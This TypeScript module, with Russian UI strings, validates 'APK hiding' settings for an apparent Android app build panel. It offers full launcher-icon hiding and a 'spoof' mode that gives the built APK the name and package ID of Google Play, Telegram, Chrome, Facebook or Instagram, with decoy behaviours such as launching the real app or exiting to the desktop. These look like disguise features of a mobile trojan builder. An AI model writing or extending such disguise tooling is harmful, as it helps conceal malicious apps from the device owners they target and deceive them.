export const APK_HIDING_METHODS = ['none', 'full', 'spoof'] as const;

export type ApkHidingMethod = (typeof APK_HIDING_METHODS)[number];

export const SPOOF_PRESET_IDS = ['google_play', 'telegram', 'chrome', 'facebook', 'instagram', 'custom'] as const;

export type SpoofPresetId = (typeof SPOOF_PRESET_IDS)[number];

export const SPOOF_DECOY_BEHAVIORS = ['launch_package', 'exit_desktop', 'webview'] as const;

export type SpoofDecoyBehavior = (typeof SPOOF_DECOY_BEHAVIORS)[number];

export type SpoofPresetMeta = {
	label: string;
	packageId: string;
	iconFile: string;
	panelIconPath: string;
};

export const SPOOF_PRESET_META: Record<Exclude<SpoofPresetId, 'custom'>, SpoofPresetMeta> = {
	google_play: {
		label: 'Google Play',
		packageId: 'com.android.vending',
		iconFile: 'google_play.png',
		panelIconPath: '/spoof-presets/google_play.png',
	},
	telegram: {
		label: 'Telegram',
		packageId: 'org.telegram.messenger',
		iconFile: 'telegram.png',
		panelIconPath: '/spoof-presets/telegram.png',
	},
	chrome: {
		label: 'Chrome',
		packageId: 'com.android.chrome',
		iconFile: 'chrome.png',
		panelIconPath: '/spoof-presets/chrome.png',
	},
	facebook: {
		label: 'Facebook',
		packageId: 'com.facebook.katana',
		iconFile: 'facebook.png',
		panelIconPath: '/spoof-presets/facebook.png',
	},
	instagram: {
		label: 'Instagram',
		packageId: 'com.instagram.android',
		iconFile: 'instagram.png',
		panelIconPath: '/spoof-presets/instagram.png',
	},
};

export const APK_HIDING_METHOD_LABELS: Record<ApkHidingMethod, string> = {
	none: 'Без скрытия',
	full: 'Полное скрытие',
	spoof: 'Скрытие подменой',
};

export const SPOOF_DECOY_BEHAVIOR_LABELS: Record<SpoofDecoyBehavior, string> = {
	launch_package: 'Вызов по идентификатору',
	exit_desktop: 'Выход на рабочий стол',
	webview: 'Показ WebView',
};

const PACKAGE_ID_REGEX = /^[a-zA-Z][a-zA-Z0-9_]*(\.[a-zA-Z][a-zA-Z0-9_]*)+$/;

export class ApkHidingError extends Error {
	constructor(message: string) {
		super(message);
		this.name = 'ApkHidingError';
	}
}

export function isApkHidingMethod(value: string): value is ApkHidingMethod {
	return (APK_HIDING_METHODS as readonly string[]).includes(value);
}

export function isSpoofPresetId(value: string): value is SpoofPresetId {
	return (SPOOF_PRESET_IDS as readonly string[]).includes(value);
}

export function isSpoofDecoyBehavior(value: string): value is SpoofDecoyBehavior {
	return (SPOOF_DECOY_BEHAVIORS as readonly string[]).includes(value);
}

export function isBuiltInSpoofPreset(value: SpoofPresetId): value is Exclude<SpoofPresetId, 'custom'> {
	return value !== 'custom';
}

export function resolveSpoofDisplayName(preset: SpoofPresetId, customName?: string | null): string {
	if (preset === 'custom') {
		return customName?.trim() ?? '';
	}
	return SPOOF_PRESET_META[preset].label;
}

export function resolveSpoofPackageId(preset: SpoofPresetId, customPackage?: string | null): string {
	if (preset === 'custom') {
		return customPackage?.trim() ?? '';
	}
	return SPOOF_PRESET_META[preset].packageId;
}

export function resolveSpoofDecoyBehavior(
	preset: SpoofPresetId,
	customBehavior?: string | null,
): SpoofDecoyBehavior {
	if (preset !== 'custom') {
		return 'launch_package';
	}
	if (customBehavior && isSpoofDecoyBehavior(customBehavior)) {
		return customBehavior;
	}
	return 'launch_package';
}

export type ValidatedApkHiding = {
	apkHidingMethod: ApkHidingMethod;
	hideIcon: boolean;
	spoofPreset: SpoofPresetId | null;
	spoofCustomName: string | null;
	spoofCustomPackage: string | null;
	spoofCustomIcon: string | null;
	spoofCustomBehavior: SpoofDecoyBehavior | null;
	spoofCustomUseWebview: boolean;
	launcherAppName: string;
	spoofAltDisplayName: string;
	spoofLaunchPackage: string;
	spoofDecoyBehavior: SpoofDecoyBehavior;
	spoofDecoyUseWebview: boolean;
};

function validateCustomName(name: string | null | undefined): string {
	const trimmed = name?.trim() ?? '';
	if (trimmed.length < 3 || trimmed.length > 32) {
		throw new ApkHidingError('Название приложения: от 3 до 32 символов');
	}
	return trimmed;
}

function validateCustomPackage(packageId: string | null | undefined): string {
	const trimmed = packageId?.trim() ?? '';
	if (trimmed.length < 10 || trimmed.length > 128) {
		throw new ApkHidingError('Идентификатор приложения: от 10 до 128 символов');
	}
	if (!PACKAGE_ID_REGEX.test(trimmed)) {
		throw new ApkHidingError('Некорректный идентификатор приложения (например com.android.vending)');
	}
	return trimmed;
}

function validateAppName(name: string | null | undefined): string {
	const trimmed = name?.trim() ?? '';
	if (!trimmed) {
		throw new ApkHidingError('Укажите название приложения');
	}
	return trimmed;
}

export function validateApkHidingInput(input: {
	apkHidingMethod: string;
	spoofPreset?: string | null;
	spoofCustomName?: string | null;
	spoofCustomPackage?: string | null;
	spoofCustomBehavior?: string | null;
	spoofCustomUseWebview?: boolean | null;
	appName?: string | null;
}): ValidatedApkHiding {
	if (!isApkHidingMethod(input.apkHidingMethod)) {
		throw new ApkHidingError('Неизвестный метод скрытия APK');
	}

	const method = input.apkHidingMethod;
	const hideIcon = method === 'full';

	if (method === 'none' || method === 'full') {
		const launcherAppName = validateAppName(input.appName);
		return {
			apkHidingMethod: method,
			hideIcon,
			spoofPreset: null,
			spoofCustomName: null,
			spoofCustomPackage: null,
			spoofCustomIcon: null,
			spoofCustomBehavior: null,
			spoofCustomUseWebview: false,
			launcherAppName,
			spoofAltDisplayName: '',
			spoofLaunchPackage: '',
			spoofDecoyBehavior: 'launch_package',
			spoofDecoyUseWebview: false,
		};
	}

	if (!input.spoofPreset || !isSpoofPresetId(input.spoofPreset)) {
		throw new ApkHidingError('Выберите приложение для подмены');
	}

	const spoofPreset = input.spoofPreset;
	const launcherAppName = validateAppName(input.appName);

	if (spoofPreset === 'custom') {
		const spoofCustomName = validateCustomName(input.spoofCustomName);
		const spoofCustomPackage = validateCustomPackage(input.spoofCustomPackage);
		const spoofCustomBehavior = resolveSpoofDecoyBehavior(spoofPreset, input.spoofCustomBehavior);
		if (input.spoofCustomBehavior && !isSpoofDecoyBehavior(input.spoofCustomBehavior)) {
			throw new ApkHidingError('Неизвестное поведение кастомного приложения');
		}
		const spoofCustomUseWebview =
			spoofCustomBehavior === 'webview' ? Boolean(input.spoofCustomUseWebview) : false;

		return {
			apkHidingMethod: 'spoof',
			hideIcon: false,
			spoofPreset,
			spoofCustomName,
			spoofCustomPackage,
			spoofCustomIcon: null,
			spoofCustomBehavior,
			spoofCustomUseWebview,
			launcherAppName,
			spoofAltDisplayName: spoofCustomName,
			spoofLaunchPackage: spoofCustomPackage,
			spoofDecoyBehavior: spoofCustomBehavior,
			spoofDecoyUseWebview: spoofCustomUseWebview,
		};
	}

	const spoofAltDisplayName = resolveSpoofDisplayName(spoofPreset);
	const spoofLaunchPackage = resolveSpoofPackageId(spoofPreset);

	return {
		apkHidingMethod: 'spoof',
		hideIcon: false,
		spoofPreset,
		spoofCustomName: null,
		spoofCustomPackage: null,
		spoofCustomIcon: null,
		spoofCustomBehavior: null,
		spoofCustomUseWebview: false,
		launcherAppName,
		spoofAltDisplayName,
		spoofLaunchPackage,
		spoofDecoyBehavior: 'launch_package',
		spoofDecoyUseWebview: false,
	};
}

/** Panel `POST /panel/start-build` always uses full hiding (UI has no other option). */
export const PANEL_START_BUILD_APK_HIDING_METHOD = 'full' as const satisfies ApkHidingMethod;

export function validatePanelStartBuildHiding(appName: string | null | undefined): ValidatedApkHiding {
	return validateApkHidingInput({
		apkHidingMethod: PANEL_START_BUILD_APK_HIDING_METHOD,
		spoofPreset: null,
		spoofCustomName: null,
		spoofCustomPackage: null,
		spoofCustomBehavior: null,
		spoofCustomUseWebview: false,
		appName,
	});
}

export function resolveApkHidingChipLabel(
	method: ApkHidingMethod | string | null | undefined,
	spoofPreset: SpoofPresetId | string | null | undefined,
	spoofCustomName: string | null | undefined,
): string {
	if (method === 'spoof') {
		if (spoofPreset && isSpoofPresetId(spoofPreset)) {
			if (spoofPreset === 'custom') {
				const name = spoofCustomName?.trim();
				return name ? `Подмена: ${name}` : 'Подмена: кастомное';
			}
			return `Подмена: ${SPOOF_PRESET_META[spoofPreset].label}`;
		}
		return 'Скрытие подменой';
	}
	if (method === 'full') {
		return APK_HIDING_METHOD_LABELS.full;
	}
	if (method === 'none') {
		return APK_HIDING_METHOD_LABELS.none;
	}
	return APK_HIDING_METHOD_LABELS.full;
}

export const INVALID_STORED_APP_ICON = new Set(['zero', 'nullable', '']);

export function isInvalidStoredAppIcon(value: string | null | undefined): boolean {
	const trimmed = value?.trim() ?? '';
	return !trimmed || INVALID_STORED_APP_ICON.has(trimmed);
}

export function resolveBuildDisplayIconUrl(input: {
	appIcon?: string | null;
	apkHidingMethod?: string | null;
	spoofPreset?: string | null;
	spoofCustomIcon?: string | null;
}): string | null {
	const appIcon = input.appIcon?.trim();
	if (!appIcon || isInvalidStoredAppIcon(appIcon)) {
		return null;
	}
	return appIcon;
}

export function resolveSpoofAltDisplayName(
	preset: SpoofPresetId | string | null | undefined,
	customName?: string | null,
): string {
	if (!preset || !isSpoofPresetId(preset)) {
		return '';
	}
	return resolveSpoofDisplayName(preset, customName);
}
